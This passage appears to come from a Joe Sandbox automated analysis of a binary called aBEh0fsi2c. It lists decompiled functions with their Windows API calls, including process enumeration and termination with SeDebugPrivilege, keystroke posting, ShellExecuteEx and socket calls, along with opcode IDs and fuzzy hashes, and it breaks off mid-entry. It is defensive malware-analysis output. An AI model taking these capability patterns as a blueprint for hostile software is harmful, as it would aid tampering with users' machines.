                                                          • Instruction Fuzzy Hash: 64913B72D00229EBDB12DFA5DC45EDEBBB9EF08310F10815AF519AB291DB715A44CFA0
                                                          APIs
                                                          • SendMessageW.USER32(00000000,00001036,00000010,00000010), ref: 003E6E24
                                                          • SendMessageW.USER32(?,00001036,00000000,?), ref: 003E6E38
                                                          • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000013), ref: 003E6E52
                                                          • _wcscat.LIBCMT ref: 003E6EAD
                                                          • SendMessageW.USER32(?,00001057,00000000,?), ref: 003E6EC4
                                                          • SendMessageW.USER32(?,00001061,?,0000000F), ref: 003E6EF2
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1336771467.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                          • Associated: 00000000.00000002.1336758325.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1336849316.00000000003EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1336849316.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1336999850.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1337053292.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_360000_aBEh0fsi2c.jbxd
                                                          Similarity
                                                          • API ID: MessageSend$Window_wcscat
                                                          • String ID: SysListView32
                                                          • API String ID: 307300125-78025650
                                                          • Opcode ID: 513bffd6ea81d389509d0cbdbfefa79cb07e558b69e1092bb897b7f639ee89b5
                                                          • Instruction ID: cc72d41dd03978ca9261e90a77b88afcbed7ff1a9e3d4a25ed0f7abd1a59bfd1
                                                          • Opcode Fuzzy Hash: 513bffd6ea81d389509d0cbdbfefa79cb07e558b69e1092bb897b7f639ee89b5
                                                          • Instruction Fuzzy Hash: FE41A370A00398EFDB229F64CC86BEE77A8EF58390F11462AF584EB1D1D6719D848B50
                                                          APIs
                                                            • Part of subcall function 003C3C55: CreateToolhelp32Snapshot.KERNEL32 ref: 003C3C7A
                                                            • Part of subcall function 003C3C55: Process32FirstW.KERNEL32(00000000,?), ref: 003C3C88
                                                            • Part of subcall function 003C3C55: CloseHandle.KERNEL32(00000000), ref: 003C3D52
                                                          • OpenProcess.KERNEL32(00000001,00000000,?), ref: 003DE9A4
                                                          • GetLastError.KERNEL32 ref: 003DE9B7
                                                          • OpenProcess.KERNEL32(00000001,00000000,?), ref: 003DE9E6
                                                          • TerminateProcess.KERNEL32(00000000,00000000), ref: 003DEA63
                                                          • GetLastError.KERNEL32(00000000), ref: 003DEA6E
                                                          • CloseHandle.KERNEL32(00000000), ref: 003DEAA3
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1336771467.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                          • Associated: 00000000.00000002.1336758325.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1336849316.00000000003EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1336849316.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1336999850.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1337053292.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_360000_aBEh0fsi2c.jbxd
                                                          Similarity
                                                          • API ID: Process$CloseErrorHandleLastOpen$CreateFirstProcess32SnapshotTerminateToolhelp32
                                                          • String ID: SeDebugPrivilege
                                                          • API String ID: 2533919879-2896544425
                                                          • Opcode ID: b2cdf2f3853cc9661da2b588cbb2dfce228e50019d7d4bda3e3d40891dc8eda3
                                                          • Instruction ID: edd8972a6712500338d330b3111d2276c7d9c7db700a5cd1400d5a356d7814c0
                                                          • Opcode Fuzzy Hash: b2cdf2f3853cc9661da2b588cbb2dfce228e50019d7d4bda3e3d40891dc8eda3
                                                          • Instruction Fuzzy Hash: C9419A712002019FDB26EF14DCA6F6EBBA9AF45314F14841AF9069F3D2CBB4AD04CB91
                                                          APIs
                                                          • LoadIconW.USER32(00000000,00007F03), ref: 003C3033
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1336771467.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                          • Associated: 00000000.00000002.1336758325.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1336849316.00000000003EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1336849316.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1336999850.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1337053292.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_360000_aBEh0fsi2c.jbxd
                                                          Similarity
                                                          • API ID: IconLoad
                                                          • String ID: blank$info$question$stop$warning
                                                          • API String ID: 2457776203-404129466
                                                          • Opcode ID: aa5714c8f740ec28707291eeefdceb3e7b004056aba4ff96bc762d2a41dfef14
                                                          • Instruction ID: 7c5eb4ad7aaf2adc91d104f8d18e986a626e176537e8326807bd429d95cc6c6b
                                                          • Opcode Fuzzy Hash: aa5714c8f740ec28707291eeefdceb3e7b004056aba4ff96bc762d2a41dfef14
                                                          • Instruction Fuzzy Hash: C6115E32348356BED7176A14DC82FAB779CEF15360B20406EF901EA1C1DBB46F4047A9
                                                          APIs
                                                          • GetModuleHandleW.KERNEL32(00000000,?,?,00000100,00000000), ref: 003C4312
                                                          • LoadStringW.USER32(00000000), ref: 003C4319
                                                          • GetModuleHandleW.KERNEL32(00000000,00001389,?,00000100), ref: 003C432F
                                                          • LoadStringW.USER32(00000000), ref: 003C4336
                                                          • _wprintf.LIBCMT ref: 003C435C
                                                          • MessageBoxW.USER32(00000000,?,?,00011010), ref: 003C437A
                                                          Strings
                                                          • %s (%d) : ==> %s: %s %s, xrefs: 003C4357
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1336771467.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                          • Associated: 00000000.00000002.1336758325.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1336849316.00000000003EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1336849316.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1336999850.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1337053292.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_360000_aBEh0fsi2c.jbxd
                                                          Similarity
                                                          • API ID: HandleLoadModuleString$Message_wprintf
                                                          • String ID: %s (%d) : ==> %s: %s %s
                                                          • API String ID: 3648134473-3128320259
                                                          • Opcode ID: 1007d4d48f3720007a41e954458e8c75ab12fabac36463c89126258c695c3138
                                                          • Instruction ID: 24e5db4edace00c3725a56904dff37f19fa25064d66af580412674abf0da658c
                                                          • Opcode Fuzzy Hash: 1007d4d48f3720007a41e954458e8c75ab12fabac36463c89126258c695c3138
                                                          • Instruction Fuzzy Hash: DD0167F690024CBFD762A790DD89FE6777CD708700F0005A5BB45E6051EA745E854B74
                                                          APIs
                                                            • Part of subcall function 00362612: GetWindowLongW.USER32(?,000000EB), ref: 00362623
                                                          • GetSystemMetrics.USER32(0000000F), ref: 003ED47C
                                                          • GetSystemMetrics.USER32(0000000F), ref: 003ED49C
                                                          • MoveWindow.USER32(00000003,?,?,?,?,00000000,?,?,?), ref: 003ED6D7
                                                          • SendMessageW.USER32(00000003,00000142,00000000,0000FFFF), ref: 003ED6F5
                                                          • SendMessageW.USER32(00000003,00000469,?,00000000), ref: 003ED716
                                                          • ShowWindow.USER32(00000003,00000000), ref: 003ED735
                                                          • InvalidateRect.USER32(?,00000000,00000001), ref: 003ED75A
                                                          • DefDlgProcW.USER32(?,00000005,?,?), ref: 003ED77D
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1336771467.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                          • Associated: 00000000.00000002.1336758325.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1336849316.00000000003EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1336849316.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1336999850.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1337053292.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_360000_aBEh0fsi2c.jbxd
                                                          Similarity
                                                          • API ID: Window$MessageMetricsSendSystem$InvalidateLongMoveProcRectShow
                                                          • String ID:
                                                          • API String ID: 1211466189-0
                                                          • Opcode ID: 851089de008dee099de00ece473294a8ccd360c2129ea44a8efbe83146911f72
                                                          • Instruction ID: 2a413346d35eeca90889360edac915c5b765af03a68fb6909673bd991e1d4dbc
                                                          • Opcode Fuzzy Hash: 851089de008dee099de00ece473294a8ccd360c2129ea44a8efbe83146911f72
                                                          • Instruction Fuzzy Hash: 99B19935600269EFDF26CF6AC9C57AD7BB1BF04701F098269EC489E2D5D770A950CB90
                                                          APIs
                                                          • ShowWindow.USER32(FFFFFFFF,?,00000000,00000000,?,0039C1C7,00000004,00000000,00000000,00000000), ref: 00362ACF
                                                          • ShowWindow.USER32(FFFFFFFF,00000000,00000000,00000000,?,0039C1C7,00000004,00000000,00000000,00000000,000000FF), ref: 00362B17
                                                          • ShowWindow.USER32(FFFFFFFF,00000006,00000000,00000000,?,0039C1C7,00000004,00000000,00000000,00000000), ref: 0039C21A
                                                          • ShowWindow.USER32(FFFFFFFF,?,00000000,00000000,?,0039C1C7,00000004,00000000,00000000,00000000), ref: 0039C286
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1336771467.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                          • Associated: 00000000.00000002.1336758325.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1336849316.00000000003EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1336849316.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1336999850.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1337053292.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_360000_aBEh0fsi2c.jbxd
                                                          Similarity
                                                          • API ID: ShowWindow
                                                          • String ID:
                                                          • API String ID: 1268545403-0
                                                          • Opcode ID: b186b17c1d9d8be8e1e03d2218935eecbeaf5ad2261495b216d24398a839db45
                                                          • Instruction ID: 439a4c3cca785eeda220a9d33cb1249339b6ba0ea8c803c755adf084a0679d89
                                                          • Opcode Fuzzy Hash: b186b17c1d9d8be8e1e03d2218935eecbeaf5ad2261495b216d24398a839db45
                                                          • Instruction Fuzzy Hash: 9E41E931A18FC09ACB379B68DC88B7B7B99AB45310F57C91DE0874B9A5CAB19841E710
                                                          APIs
                                                          • InterlockedExchange.KERNEL32(?,000001F5), ref: 003C70DD
                                                            • Part of subcall function 00380DB6: std::exception::exception.LIBCMT ref: 00380DEC
                                                            • Part of subcall function 00380DB6: __CxxThrowException@8.LIBCMT ref: 00380E01
                                                          • ReadFile.KERNEL32(0000FFFF,00000000,0000FFFF,?,00000000), ref: 003C7114
                                                          • EnterCriticalSection.KERNEL32(?), ref: 003C7130
                                                          • _memmove.LIBCMT ref: 003C717E
                                                          • _memmove.LIBCMT ref: 003C719B
                                                          • LeaveCriticalSection.KERNEL32(?), ref: 003C71AA
                                                          • ReadFile.KERNEL32(0000FFFF,00000000,0000FFFF,00000000,00000000), ref: 003C71BF
                                                          • InterlockedExchange.KERNEL32(?,000001F6), ref: 003C71DE
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1336771467.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                          • Associated: 00000000.00000002.1336758325.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1336849316.00000000003EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1336849316.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1336999850.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1337053292.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_360000_aBEh0fsi2c.jbxd
                                                          Similarity
                                                          • API ID: CriticalExchangeFileInterlockedReadSection_memmove$EnterException@8LeaveThrowstd::exception::exception
                                                          • String ID:
                                                          • API String ID: 256516436-0
                                                          • Opcode ID: b767c9c59e984b029f0c88fc5d3152e2ebe5a596263552255304ff6b81f91a6f
                                                          • Instruction ID: 48368c320dd152838d2b3c3fdfb8e0eaa79ea8c6882c4d19071ebc4b0e694807
                                                          • Opcode Fuzzy Hash: b767c9c59e984b029f0c88fc5d3152e2ebe5a596263552255304ff6b81f91a6f
                                                          • Instruction Fuzzy Hash: D8316D35900205EFCB51EFA4DC85AABB778EF45310F1581A9E9049F296DB70AE14CB60
                                                          APIs
                                                          • DeleteObject.GDI32(00000000), ref: 003E61EB
                                                          • GetDC.USER32(00000000), ref: 003E61F3
                                                          • GetDeviceCaps.GDI32(00000000,0000005A), ref: 003E61FE
                                                          • ReleaseDC.USER32(00000000,00000000), ref: 003E620A
                                                          • CreateFontW.GDI32(?,00000000,00000000,00000000,?,00000000,00000000,00000000,00000001,00000004,00000000,?,00000000,?), ref: 003E6246
                                                          • SendMessageW.USER32(?,00000030,00000000,00000001), ref: 003E6257
                                                          • MoveWindow.USER32(?,?,?,?,?,00000000,?,?,003E902A,?,?,000000FF,00000000,?,000000FF,?), ref: 003E6291
                                                          • SendMessageW.USER32(?,00000142,00000000,00000000), ref: 003E62B1
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1336771467.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                          • Associated: 00000000.00000002.1336758325.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1336849316.00000000003EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1336849316.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1336999850.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1337053292.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_360000_aBEh0fsi2c.jbxd
                                                          Similarity
                                                          • API ID: MessageSend$CapsCreateDeleteDeviceFontMoveObjectReleaseWindow
                                                          • String ID:
                                                          • API String ID: 3864802216-0
                                                          • Opcode ID: 8be9614a55d6f17864d0ba245b0022ee90b5aab37154f7b31ae575e6973bb1fb
                                                          • Instruction ID: a330080a731f490062b9f72b6b40304226fa6b7a733746694c9aa5700dca0eb4
                                                          • Opcode Fuzzy Hash: 8be9614a55d6f17864d0ba245b0022ee90b5aab37154f7b31ae575e6973bb1fb
                                                          • Instruction Fuzzy Hash: 0D317C72100260AFEB228F518C8AFEA3BADEF59761F054165FE089E2D1C6B59C41CB60
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1336771467.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                          • Associated: 00000000.00000002.1336758325.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1336849316.00000000003EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1336849316.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1336999850.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1337053292.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_360000_aBEh0fsi2c.jbxd
                                                          Similarity
                                                          • API ID: _memcmp
                                                          • String ID:
                                                          • API String ID: 2931989736-0
                                                          • Opcode ID: f69ae3acb0a5b27b103ebd8699b427170c7fe35ee8307913a679e5f27cfc8eba
                                                          • Instruction ID: a071b21bf9563a8b2a43030591ffdebb50e6de9bc22695d8f5ded941bcbde9f1
                                                          • Opcode Fuzzy Hash: f69ae3acb0a5b27b103ebd8699b427170c7fe35ee8307913a679e5f27cfc8eba
                                                          • Instruction Fuzzy Hash: D3214162601609BBE607B7129D42FFBB76D9E1038CB054060FF059AE47EFD4DE1182A1
                                                          APIs
                                                            • Part of subcall function 00369837: __itow.LIBCMT ref: 00369862
                                                            • Part of subcall function 00369837: __swprintf.LIBCMT ref: 003698AC
                                                            • Part of subcall function 0037FC86: _wcscpy.LIBCMT ref: 0037FCA9
                                                          • _wcstok.LIBCMT ref: 003CEC94
                                                          • _wcscpy.LIBCMT ref: 003CED23
                                                          • _memset.LIBCMT ref: 003CED56
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1336771467.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                          • Associated: 00000000.00000002.1336758325.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1336849316.00000000003EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1336849316.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1336999850.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1337053292.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_360000_aBEh0fsi2c.jbxd
                                                          Similarity
                                                          • API ID: _wcscpy$__itow__swprintf_memset_wcstok
                                                          • String ID: X
                                                          • API String ID: 774024439-3081909835
                                                          • Opcode ID: ba81cfdbb8c44983326a8c89d4826cd194f9fa6d2732bfee79f0d06f1a34fdc5
                                                          • Instruction ID: 6eefa25d1fdd9a268710ceb0a7e89d8e716c0afde9c479b288380d4832490732
                                                          • Opcode Fuzzy Hash: ba81cfdbb8c44983326a8c89d4826cd194f9fa6d2732bfee79f0d06f1a34fdc5
                                                          • Instruction Fuzzy Hash: ECC16E715083419FC766EF64C885F5AB7E4AF85314F01892DF899DB2A2DB70EC45CB82
                                                          APIs
                                                          • __WSAFDIsSet.WSOCK32(00000000,?), ref: 003D6C00
                                                          • #17.WSOCK32(00000000,?,?,00000000,?,00000010), ref: 003D6C21
                                                          • WSAGetLastError.WSOCK32(00000000), ref: 003D6C34
                                                          • htons.WSOCK32(?), ref: 003D6CEA
                                                          • inet_ntoa.WSOCK32(?), ref: 003D6CA7
                                                            • Part of subcall function 003BA7E9: _strlen.LIBCMT ref: 003BA7F3
                                                            • Part of subcall function 003BA7E9: _memmove.LIBCMT ref: 003BA815
                                                          • _strlen.LIBCMT ref: 003D6D44
                                                          • _memmove.LIBCMT ref: 003D6DAD
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1336771467.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                          • Associated: 00000000.00000002.1336758325.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1336849316.00000000003EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1336849316.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1336999850.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1337053292.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_360000_aBEh0fsi2c.jbxd
                                                          Similarity
                                                          • API ID: _memmove_strlen$ErrorLasthtonsinet_ntoa
                                                          • String ID:
                                                          • API String ID: 3619996494-0
                                                          • Opcode ID: fbf93b9af05a4ecc9432adf48c3e927bbbc3d945213343957dbe44dd2d861cdb
                                                          • Instruction ID: b77961d5f9c4d556d7f88dceffc8bffc471303d5060eeae6ce9f5c6c1c09b74b
                                                          • Opcode Fuzzy Hash: fbf93b9af05a4ecc9432adf48c3e927bbbc3d945213343957dbe44dd2d861cdb
                                                          • Instruction Fuzzy Hash: D781A172204300ABC712EB64EC92F6AB7EDAF94714F108A1EF5659F292DB70ED05CB51
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1336771467.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                          • Associated: 00000000.00000002.1336758325.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1336849316.00000000003EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1336849316.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1336999850.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1337053292.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_360000_aBEh0fsi2c.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: d94f15b393ff3d816b6dc148c999a323d7ddcb24c7fa3d1af4c225a349371697
                                                          • Instruction ID: 706b90bc3dfb7cb46fc722ce3c0b18fbda64366b3e52eb45b3c86ac55dcbdbf8
                                                          • Opcode Fuzzy Hash: d94f15b393ff3d816b6dc148c999a323d7ddcb24c7fa3d1af4c225a349371697
                                                          • Instruction Fuzzy Hash: 44717D30900109EFCB16CF99CC89ABEBB79FF85310F19C259F915AB255C770AA51CB60
                                                          APIs
                                                          • IsWindow.USER32(00E0CFA0), ref: 003EB3EB
                                                          • IsWindowEnabled.USER32(00E0CFA0), ref: 003EB3F7
                                                          • SendMessageW.USER32(?,0000041C,00000000,00000000), ref: 003EB4DB
                                                          • SendMessageW.USER32(00E0CFA0,000000B0,?,?), ref: 003EB512
                                                          • IsDlgButtonChecked.USER32(?,?), ref: 003EB54F
                                                          • GetWindowLongW.USER32(00E0CFA0,000000EC), ref: 003EB571
                                                          • SendMessageW.USER32(?,000000A1,00000002,00000000), ref: 003EB589
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1336771467.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                          • Associated: 00000000.00000002.1336758325.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1336849316.00000000003EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1336849316.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1336999850.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1337053292.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_360000_aBEh0fsi2c.jbxd
                                                          Similarity
                                                          • API ID: MessageSendWindow$ButtonCheckedEnabledLong
                                                          • String ID:
                                                          • API String ID: 4072528602-0
                                                          • Opcode ID: b5842d38cc0b429648642247fb33e928f9fa8a947b1308bc2880c93514c9009b
                                                          • Instruction ID: bf6cffbe150812b1b1a0c0d27be1e129cff9be9121a846c6c4e329ea8120c855
                                                          • Opcode Fuzzy Hash: b5842d38cc0b429648642247fb33e928f9fa8a947b1308bc2880c93514c9009b
                                                          • Instruction Fuzzy Hash: 9F718B346042A4AFDB239F56C8D1FBBBBA9EF09300F154269E945972E2C771A940CF50
                                                          APIs
                                                          • _memset.LIBCMT ref: 003DF448
                                                          • _memset.LIBCMT ref: 003DF511
                                                          • ShellExecuteExW.SHELL32(?), ref: 003DF556
                                                            • Part of subcall function 00369837: __itow.LIBCMT ref: 00369862
                                                            • Part of subcall function 00369837: __swprintf.LIBCMT ref: 003698AC
                                                            • Part of subcall function 0037FC86: _wcscpy.LIBCMT ref: 0037FCA9
                                                          • GetProcessId.KERNEL32(00000000), ref: 003DF5CD
                                                          • CloseHandle.KERNEL32(00000000), ref: 003DF5FC
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1336771467.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                          • Associated: 00000000.00000002.1336758325.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1336849316.00000000003EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1336849316.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1336999850.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1337053292.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_360000_aBEh0fsi2c.jbxd
                                                          Similarity
                                                          • API ID: _memset$CloseExecuteHandleProcessShell__itow__swprintf_wcscpy
                                                          • String ID: @
                                                          • API String ID: 3522835683-2766056989
                                                          • Opcode ID: bafd76aa0d0ebd2e895e7b7d0bfa2565f32d1844268f55904f8de45047c88d2d
                                                          • Instruction ID: bcdc562b8757cc9a55dcf18d39128c73721026ea235b7ff3edbe93303d6358ff
                                                          • Opcode Fuzzy Hash: bafd76aa0d0ebd2e895e7b7d0bfa2565f32d1844268f55904f8de45047c88d2d
                                                          • Instruction Fuzzy Hash: DC619075A00619DFCF16EFA4D4819AEBBF5FF49314F14806AE85AAB351CB30AD41CB90
                                                          APIs
                                                          • GetParent.USER32(?), ref: 003C0F8C
                                                          • GetKeyboardState.USER32(?), ref: 003C0FA1
                                                          • SetKeyboardState.USER32(?), ref: 003C1002
                                                          • PostMessageW.USER32(?,00000101,00000010,?), ref: 003C1030
                                                          • PostMessageW.USER32(?,00000101,00000011,?), ref: 003C104F
                                                          • PostMessageW.USER32(?,00000101,00000012,?), ref: 003C1095
                                                          • PostMessageW.USER32(?,00000101,0000005B,?), ref: 003C10B8
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1336771467.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                          • Associated: 00000000.00000002.1336758325.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1336849316.00000000003EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1336849316.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1336999850.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1337053292.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_360000_aBEh0fsi2c.jbxd
                                                          Similarity
                                                          • API ID: MessagePost$KeyboardState$Parent
                                                          • String ID:
                                                          • API String ID: 87235514-0
                                                          • Opcode ID: 187a6f7e707e9b19b4a42bec78dabf2ee2638f6df6c2e42e849974d2e736f087
                                                          • Instruction ID: c8625fc1d9ed665f6f0e49ad284bb040297aea92aaffaf250131cadc1a9e4352
                                                          • Opcode Fuzzy Hash: 187a6f7e707e9b19b4a42bec78dabf2ee2638f6df6c2e42e849974d2e736f087
                                                          • Instruction Fuzzy Hash: 7651CFA05046D57DFB3742348C55FBABEA96B07304F09858DE1D4CA8D3C2D9ACD8E751
                                                          APIs
                                                          • GetParent.USER32(00000000), ref: 003C0DA5
                                                          • GetKeyboardState.USER32(?), ref: 003C0DBA
                                                          • SetKeyboardState.USER32(?), ref: 003C0E1B
                                                          • PostMessageW.USER32(00000000,00000100,00000010,?), ref: 003C0E47
                                                          • PostMessageW.USER32(00000000,00000100,00000011,?), ref: 003C0E64
                                                          • PostMessageW.USER32(00000000,00000100,00000012,?), ref: 003C0EA8
                                                          • PostMessageW.USER32(00000000,00000100,0000005B,?), ref: 003C0EC9
                                                          Memory Dump Source
